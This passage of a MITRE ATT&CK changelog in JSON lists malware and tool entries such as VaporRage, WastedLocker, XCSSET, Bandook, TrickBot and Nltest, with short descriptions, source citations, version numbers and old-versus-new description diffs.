"description": "[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0636",
"external_id": "S0636"
},
{
"source_name": "MSTIC Nobelium Toolset May 2021",
"description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.",
"url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"VaporRage"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--46cbafbc-8907-42d3-9002-5327c26f8927",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-20 17:44:26.582000+00:00",
"modified": "2021-09-27 17:36:37.593000+00:00",
"name": "WastedLocker",
"description": "[WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) ",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0612",
"external_id": "S0612"
},
{
"source_name": "WastedLocker",
"description": "(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020) "
},
{
"source_name": "Symantec WastedLocker June 2020",
"description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.",
"url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us"
},
{
"source_name": "NCC Group WastedLocker June 2020",
"description": "Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.",
"url": "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/"
},
{
"source_name": "Sentinel Labs WastedLocker July 2020",
"description": "Walter, J.. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.",
"url": "https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"WastedLocker"
],
"x_mitre_contributors": [
"Daniyal Naeem, BT Security"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "tool",
"id": "tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-14 21:45:30.280000+00:00",
"modified": "2021-09-21 18:03:13.205000+00:00",
"name": "Wevtutil",
"description": "[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)",
"revoked": false,
"labels": [
"tool"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0645",
"external_id": "S0645"
},
{
"source_name": "Wevtutil Microsoft Documentation",
"description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Wevtutil"
],
"x_mitre_contributors": [
"Viren Chaudhari, Qualys",
"Harshal Tupsamudre, Qualys"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--e14085cb-0e8d-4be6-92ba-e3b93ee5978f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-05 21:58:51.161000+00:00",
"modified": "2021-10-19 00:43:30.036000+00:00",
"name": "XCSSET",
"description": "[XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0658",
"external_id": "S0658"
},
{
"source_name": "XCSSET",
"description": "(Citation: trendmicro xcsset xcode project 2020)"
},
{
"source_name": "OSX.DubRobber",
"description": "(Citation: malwarebyteslabs xcsset dubrobber)"
},
{
"source_name": "trendmicro xcsset xcode project 2020",
"description": "Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.",
"url": "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"
},
{
"source_name": "malwarebyteslabs xcsset dubrobber",
"description": "Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.",
"url": "https://blog.malwarebytes.com/detections/osx-dubrobber/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"XCSSET",
"OSX.DubRobber"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--21583311-6321-4891-8a37-3eb4e57b0fb1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-29 00:04:26.906000+00:00",
"modified": "2021-10-16 02:20:16.562000+00:00",
"name": "xCaon",
"description": "[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0653",
"external_id": "S0653"
},
{
"source_name": "xCaon",
"description": "(Citation: Checkpoint IndigoZebra July 2021)"
},
{
"source_name": "Checkpoint IndigoZebra July 2021",
"description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.",
"url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
},
{
"source_name": "Securelist APT Trends Q2 2017",
"description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.",
"url": "https://securelist.com/apt-trends-report-q2-2017/79332/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"xCaon"
],
"x_mitre_contributors": [
"Pooja Natarajan, NEC Corporation India",
"Yoshihiro Kori, NEC Corporation",
"Manikantan Srinivasan, NEC Corporation India"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
}
],
"major_version_changes": [
{
"type": "malware",
"id": "malware--835a79f1-842d-472d-b8f4-d54b545c341b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2018-10-17 00:14:20.652000+00:00",
"modified": "2021-10-11 19:42:14.066000+00:00",
"name": "Bandook",
"description": "[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as \"Operation Manul\".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0234",
"external_id": "S0234"
},
{
"source_name": "EFF Manul Aug 2016",
"description": "Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.",
"url": "https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf"
},
{
"source_name": "Lookout Dark Caracal Jan 2018",
"description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.",
"url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
},
{
"source_name": "CheckPoint Bandook Nov 2020",
"description": "Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.",
"url": "https://research.checkpoint.com/2020/bandook-signed-delivered/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Bandook"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-11 19:42:14.066000+00:00\", \"old_value\": \"2020-03-30 15:08:51.834000+00:00\"}, \"root['description']\": {\"new_value\": \"[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as \\\"Operation Manul\\\".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)\", \"old_value\": \"[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007 (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"CheckPoint Bandook Nov 2020\", \"description\": \"Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.\", \"url\": \"https://research.checkpoint.com/2020/bandook-signed-delivered/\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 2.0",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Bandook](https://attack.mitre.org/software/S0234) is a comm | t | 1 | [Bandook](https://attack.mitre.org/software/S0234) is a comm |
| > | ercially available RAT, written in Delphi, which has been av | > | ercially available RAT, written in Delphi and C++, that has | ||
| > | ailable since roughly 2007 (Citation: EFF Manul Aug 2016) ( | > | been available since at least 2007. It has been used against | ||
| > | Citation: Lookout Dark Caracal Jan 2018). | > | government, financial, energy, healthcare, education, IT, a | ||
| > | nd legal organizations in the US, South America, Europe, and | ||||
| > | Southeast Asia. [Bandook](https://attack.mitre.org/software | ||||
| > | /S0234) has been used by [Dark Caracal](https://attack.mitre | ||||
| > | .org/groups/G0070), as well as in a separate campaign referr | ||||
| > | ed to as \"Operation Manul\".(Citation: EFF Manul Aug 2016)(Ci | ||||
| > | tation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint | ||||
| > | Bandook Nov 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Dok](https://attack.mitre.org/software/S0281) steals bankin | t | 1 | [Dok](https://attack.mitre.org/software/S0281) is a Trojan a |
| > | g information through man-in-the-middle (Citation: objsee m | > | pplication disguised as a .zip file that is able to collect | ||
| > | ac malware 2017). | > | user credentials and install a malicious proxy server to red | ||
| > | irect a user's network traffic (i.e. [Adversary-in-the-Middl | ||||
| > | e](https://attack.mitre.org/techniques/T1557)).(Citation: ob | ||||
| > | jsee mac malware 2017)(Citation: hexed osx.dok analysis 2019 | ||||
| > | )(Citation: CheckPoint Dok) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Dridex](https://attack.mitre.org/software/S0384) is a banki | t | 1 | [Dridex](https://attack.mitre.org/software/S0384) is a proli |
| > | ng Trojan that has been used for financial gain. Dridex was | > | fic banking Trojan that first appeared in 2014. By December | ||
| > | created from the source code of the Bugat banking trojan (al | > | 2019, the US Treasury estimated [Dridex](https://attack.mitr | ||
| > | so known as Cridex).(Citation: Dell Dridex Oct 2015)(Citatio | > | e.org/software/S0384) had infected computers in hundreds of | ||
| > | n: Kaspersky Dridex May 2017) | > | banks and financial institutions in over 40 countries, leadi | ||
| > | ng to more than $100 million in theft. [Dridex](https://atta | ||||
| > | ck.mitre.org/software/S0384) was created from the source cod | ||||
| > | e of the Bugat banking Trojan (also known as Cridex).(Citati | ||||
| > | on: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 201 | ||||
| > | 7)(Citation: Treasury EvilCorp Dec 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [GuLoader](https://attack.mitre.org/software/S0561) is a fil | t | 1 | [GuLoader](https://attack.mitre.org/software/S0561) is a fil |
| > | e downloader that has been used since at least December 2019 | > | e downloader that has been used since at least December 2019 | ||
| > | to distribute a variety of remote administration tool (RAT) | > | to distribute a variety of remote administration tool (RAT) | ||
| > | malware, including [NETWIRE](https://attack.mitre.org/softw | > | malware, including [NETWIRE](https://attack.mitre.org/softw | ||
| > | are/S0198).(Citation: Unit 42 NETWIRE April 2020) | > | are/S0198), [Agent Tesla](https://attack.mitre.org/software/ | ||
| > | S0331), [NanoCore](https://attack.mitre.org/software/S0336), | ||||
| > | FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April | ||||
| > | 2020)(Citation: Medium Eli Salem GuLoader April 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Kerrdown](https://attack.mitre.org/software/S0585) is a dow | t | 1 | [Kerrdown](https://attack.mitre.org/software/S0585) is a cus |
| > | nloader used by [APT32](https://attack.mitre.org/groups/G005 | > | tom downloader that has been used by [APT32](https://attack. | ||
| > | 0) to install spyware from a server on the victim's network. | > | mitre.org/groups/G0050) since at least 2018 to install spywa | ||
| > | (Citation: Amnesty Intl. Ocean Lotus February 2021) | > | re from a server on the victim's network.(Citation: Amnesty | ||
| > | Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown | ||||
| > | February 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Lokibot](https://attack.mitre.org/software/S0447) is a malw | t | 1 | [Lokibot](https://attack.mitre.org/software/S0447) is a wide |
| > | are designed to collect credentials and security tokens from | > | ly distributed information stealer that was first reported i | ||
| > | an infected machine. [Lokibot](https://attack.mitre.org/sof | > | n 2015. It is designed to steal sensitive information such a | ||
| > | tware/S0447) has also been used to establish backdoors in en | > | s usernames, passwords, cryptocurrency wallets, and other cr | ||
| > | terprise environments.(Citation: Infoblox Lokibot January 20 | > | edentials. [Lokibot](https://attack.mitre.org/software/S0447 | ||
| > | 19)(Citation: Morphisec Lokibot April 2020) | > | ) can also create a backdoor into infected systems to allow | ||
| > | an attacker to install additional payloads.(Citation: Infobl | ||||
| > | ox Lokibot January 2019)(Citation: Morphisec Lokibot April 2 | ||||
| > | 020)(Citation: CISA Lokibot September 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Metamorfo](https://attack.mitre.org/software/S0455) is a ba | t | 1 | [Metamorfo](https://attack.mitre.org/software/S0455) is a La |
| > | nking trojan operated by a Brazilian cybercrime group that h | > | tin-American banking trojan operated by a Brazilian cybercri | ||
| > | as been active since at least April 2018. The group focuses | > | me group that has been active since at least April 2018. The | ||
| > | on targeting mostly Brazilian users.(Citation: Medium Metamo | > | group focuses on targeting banks and cryptocurrency service | ||
| > | rfo Apr 2020) | > | s in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020) | ||
| > | (Citation: ESET Casbaneiro Oct 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Octopus](https://attack.mitre.org/software/S0340) is a Wind | t | 1 | [Octopus](https://attack.mitre.org/software/S0340) is a Wind |
| > | ows Trojan.(Citation: Securelist Octopus Oct 2018) | > | ows Trojan written in the Delphi programming language that h | ||
| > | as been used by [Nomadic Octopus](https://attack.mitre.org/g | ||||
| > | roups/G0133) to target government organizations in Central A | ||||
| > | sia since at least 2014.(Citation: Securelist Octopus Oct 20 | ||||
| > | 18)(Citation: Security Affairs DustSquad Oct 2018)(Citation: | ||||
| > | ESET Nomadic Octopus 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Taidoor](https://attack.mitre.org/software/S0011) is malwar | t | 1 | [Taidoor](https://attack.mitre.org/software/S0011) is a remo |
| > | e that has been used since at least 2010, primarily to targe | > | te access trojan (RAT) that has been used by Chinese governm | ||
| > | t Taiwanese government organizations. (Citation: TrendMicro | > | ent cyber actors to maintain access on victim networks.(Cita | ||
| > | Taidoor) | > | tion: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor]( | ||
| > | https://attack.mitre.org/software/S0011) has primarily been | ||||
| > | used against Taiwanese government organizations since at lea | ||||
| > | st 2010.(Citation: TrendMicro Taidoor) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [TrickBot](https://attack.mitre.org/software/S0266) is a Tro | t | 1 | [TrickBot](https://attack.mitre.org/software/S0266) is a Tro |
| > | jan spyware program that has mainly been used for targeting | > | jan spyware program written in C++ that first emerged in Sep | ||
| > | banking sites in United States, Canada, UK, Germany, Austral | > | tember 2016 as a possible successor to [Dyre](https://attack | ||
| > | ia, Austria, Ireland, London, Switzerland, and Scotland. Tri | > | .mitre.org/software/S0024). [TrickBot](https://attack.mitre. | ||
| > | ckBot first emerged in the wild in September 2016 and appear | > | org/software/S0266) was developed and initially used by [Wiz | ||
| > | s to be a successor to [Dyre](https://attack.mitre.org/softw | > | ard Spider](https://attack.mitre.org/groups/G0102) for targe | ||
| > | are/S0024). [TrickBot](https://attack.mitre.org/software/S02 | > | ting banking sites in North America, Australia, and througho | ||
| > | 66) is developed in the C++ programming language. (Citation: | > | ut Europe; it has since been used against all sectors worldw | ||
| > | S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oc | > | ide as part of \"big game hunting\" ransomware campaigns.(Cita | ||
| > | t 2016) (Citation: IBM TrickBot Nov 2016) | > | tion: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBo | ||
| > | t Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Crowd | ||||
| > | Strike Wizard Spider October 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Aria-body](https://attack.mitre.org/software/S0456) is a cu | t | 1 | [Aria-body](https://attack.mitre.org/software/S0456) is a cu |
| > | stom backdoor that has been used by [Naikon](https://attack. | > | stom backdoor that has been used by [Naikon](https://attack. | ||
| > | mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 202 | > | mitre.org/groups/G0019) since approximately 2017.(Citation: | ||
| > | 0) | > | CheckPoint Naikon May 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Bazar](https://attack.mitre.org/software/S0534) is a downlo | t | 1 | [Bazar](https://attack.mitre.org/software/S0534) is a downlo |
| > | ader and backdoor malware in use since at least April 2020, | > | ader and backdoor that has been used since at least April 20 | ||
| > | with infections mainly targeting professional services, heal | > | 20, with infections primarily against professional services, | ||
| > | thcare, manufacturing, IT, logistics and travel companies ac | > | healthcare, manufacturing, IT, logistics and travel compani | ||
| > | ross the US and Europe. [Bazar](https://attack.mitre.org/sof | > | es across the US and Europe. [Bazar](https://attack.mitre.or | ||
| > | tware/S0534) has been reported to have ties to [TrickBot](ht | > | g/software/S0534) reportedly has ties to [TrickBot](https:// | ||
| > | tps://attack.mitre.org/software/S0266) campaigns and can be | > | attack.mitre.org/software/S0266) campaigns and can be used t | ||
| > | used to deploy additional malware, including ransomware, and | > | o deploy additional malware, including ransomware, and to st | ||
| > | to steal sensitive data.(Citation: Cybereason Bazar July 20 | > | eal sensitive data.(Citation: Cybereason Bazar July 2020) | ||
| > | 20) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Bisonal](https://attack.mitre.org/software/S0268) is malwar | t | 1 | [Bisonal](https://attack.mitre.org/software/S0268) is malwar |
| > | e that has been used in attacks against targets in Russia, S | > | e that has been used in attacks against targets in Russia, S | ||
| > | outh Korea, and Japan. It has been observed in the wild sinc | > | outh Korea, and Japan. It has been observed in the wild sinc | ||
| > | e 2014. (Citation: Unit 42 Bisonal July 2018) | > | e 2014.(Citation: Unit 42 Bisonal July 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [China Chopper](https://attack.mitre.org/software/S0020) is | t | 1 | [China Chopper](https://attack.mitre.org/software/S0020) is |
| > | a [Web Shell](https://attack.mitre.org/techniques/T1505/003) | > | a [Web Shell](https://attack.mitre.org/techniques/T1505/003) | ||
| > | hosted on Web servers to provide access back into an enterp | > | hosted on Web servers to provide access back into an enterp | ||
| > | rise network that does not rely on an infected system callin | > | rise network that does not rely on an infected system callin | ||
| > | g back to a remote command and control server. (Citation: Le | > | g back to a remote command and control server. (Citation: Le | ||
| > | e 2013) It has been used by several threat groups. (Citation | > | e 2013) It has been used by several threat groups. (Citation | ||
| > | : Dell TG-3390) (Citation: FireEye Periscope March 2018) | > | : Dell TG-3390) (Citation: FireEye Periscope March 2018)(Cit | ||
| > | ation: CISA AA21-200A APT40 July 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Crimson](https://attack.mitre.org/software/S0115) is malwar | t | 1 | [Crimson](https://attack.mitre.org/software/S0115) is a remo |
| > | e used as part of a campaign known as Operation Transparent | > | te access Trojan that has been used by [Transparent Tribe](h | ||
| > | Tribe that targeted Indian diplomatic and military victims. | > | ttps://attack.mitre.org/groups/G0134) since at least 2016.(C | ||
| > | (Citation: Proofpoint Operation Transparent Tribe March 2016 | > | itation: Proofpoint Operation Transparent Tribe March 2016)( | ||
| > | ) | > | Citation: Kaspersky Transparent Tribe August 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Kinsing](https://attack.mitre.org/software/S0599) is Golang | t | 1 | [Kinsing](https://attack.mitre.org/software/S0599) is Golang |
| > | -based malware that runs a cryptocurrency miner and attempts | > | -based malware that runs a cryptocurrency miner and attempts | ||
| > | to spread itself to other hosts in the victim environment. | > | to spread itself to other hosts in the victim environment. | ||
| > | (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing | > | (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing | ||
| > | November 2020) | > | November 2020)(Citation: Aqua Security Cloud Native Threat | ||
| > | Report June 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [NETWIRE](https://attack.mitre.org/software/S0198) is a publ | t | 1 | [NETWIRE](https://attack.mitre.org/software/S0198) is a publ |
| > | icly available, multiplatform remote administration tool (RA | > | icly available, multiplatform remote administration tool (RA | ||
| > | T) that has been used by criminal and APT groups since at le | > | T) that has been used by criminal and APT groups since at le | ||
| > | ast 2012.(Citation: FireEye APT33 Sept 2017) (Citation: McAf | > | ast 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfe | ||
| > | ee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2 | > | e Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 201 | ||
| > | 017) | > | 7) |
net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.",
"revoked": false,
"labels": [
"tool"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0039",
"external_id": "S0039"
},
{
"source_name": "Microsoft Net Utility",
"description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.",
"url": "https://msdn.microsoft.com/en-us/library/aa939914"
},
{
"source_name": "Savill 1999",
"description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.",
"url": "http://windowsitpro.com/windows/netexe-reference"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Net",
"net.exe"
],
"x_mitre_contributors": [
"David Ferguson, CyberSponse"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 20:33:54.392000+00:00\", \"old_value\": \"2021-04-23 20:17:30.467000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.3\", \"old_value\": \"2.2\"}}}",
"previous_version": "2.2",
"version_change": "2.2 \u2192 2.3"
},
{
"type": "tool",
"id": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-02-14 17:08:55.176000+00:00",
"modified": "2021-10-07 16:41:18.760000+00:00",
"name": "Nltest",
"description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)",
"revoked": false,
"labels": [
"tool"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0359",
"external_id": "S0359"
},
{
"source_name": "Nltest Manual",
"description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.",
"url": "https://ss64.com/nt/nltest.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Nltest"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-07 16:41:18.760000+00:00\", \"old_value\": \"2019-04-22 19:06:17.325000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1"
},
{
"type": "malware",
"id": "malware--f1314e75-ada8-49f4-b281-b1fb8b48f2a7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-08-29 18:52:20.879000+00:00",
"modified": "2021-10-16 20:44:20.719000+00:00",
"name": "OSX/Shlayer",
"description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0402",
"external_id": "S0402"
},
{
"source_name": "OSX/Shlayer",
"description": "(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)"
},
{
"source_name": "Zshlayer",
"description": "(Citation: sentinelone shlayer to zshlayer)"
},
{
"source_name": "Crossrider",
"description": "(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)"
},
{
"source_name": "Carbon Black Shlayer Feb 2019",
"description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.",
"url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/"
},
{
"source_name": "Intego Shlayer Feb 2018",
"description": "Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.",
"url": "https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/"
},
{
"source_name": "sentinelone shlayer to zshlayer",
"description": "Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.",
"url": "https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/"
},
{
"source_name": "Intego Shlayer Apr 2018",
"description": "Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.",
"url": "https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/"
},
{
"source_name": "Malwarebytes Crossrider Apr 2018",
"description": "Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.",
"url": "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"OSX/Shlayer",
"Zshlayer",
"Crossrider"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.2",
